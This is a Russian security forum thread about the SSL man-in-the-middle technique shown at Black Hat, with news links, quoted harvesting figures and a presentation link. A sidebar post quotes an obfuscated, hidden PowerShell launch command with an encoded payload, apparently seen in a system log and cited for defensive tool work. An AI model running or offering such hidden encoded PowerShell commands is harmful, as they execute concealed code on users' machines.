Перейти к содержанию
p2u

Техника успешного внедрения в SSL соединение

Recommended Posts

p2u

На конференции Black Hat показали как можно незаметно и успешно атаковать (перехватывать) защищённую SSL сессию для сайтов на которых присутствует как защищённый, так и не защищённый контент...

Источники:

Man-in-the-middle attack sidesteps SSL

New SSL Web site hack revealed

Добыча:

To prove the usefulness of the attack to a hypothetical criminal, he claimed the hack had given him access to 117 e-mail accounts, 16 credit card numbers, 7 PayPal log-ins, and over 300 other "miscellaneous secure log-ins" in a 24-hour period. Sites involved included Ticketmaster, Paypal, LinkedIn, Hotmail, and Gmail.

Paul

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr

Спасибо! Вовремя и очень в тему - для моей работы очень поможет!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
p2u

@ alexgr

Хорошо осознать, что производители браузеров сами провоцируют такие атаки в своём стремлении делать всё как можно 'удобно' для пользователей. Удобство, как практика показывает, не лучший советчик в вопросах безопасности. У меня в Firefox такое не пройдёт (Не настройки по умолчанию!): Tools - Options - Security - Warning messages (Settings...):

d0fdd48958b4.jpg

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
p2u

Презентация техники успешного внедрения в SSL соединение в формате .pdf: Marlin Spike Defeating SSL (2.33 MB)

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr
Презентация техники успешного внедрения в SSL соединение в формате .pdf: Marlin Spike Defeating SSL (2.33 MB)

Paul

Спасибо! очень кстати, к сегодняшнему эвенту в одном из банков :rolleyes:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dav

Уже появился вроде PoC

На конференции Black Hat показали как можно незаметно и успешно атаковать (перехватывать) защищённую SSL сессию для сайтов на которых присутствует как защищённый, так и не защищённый контент...

Источники:

Man-in-the-middle attack sidesteps SSL

New SSL Web site hack revealed

Добыча:

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×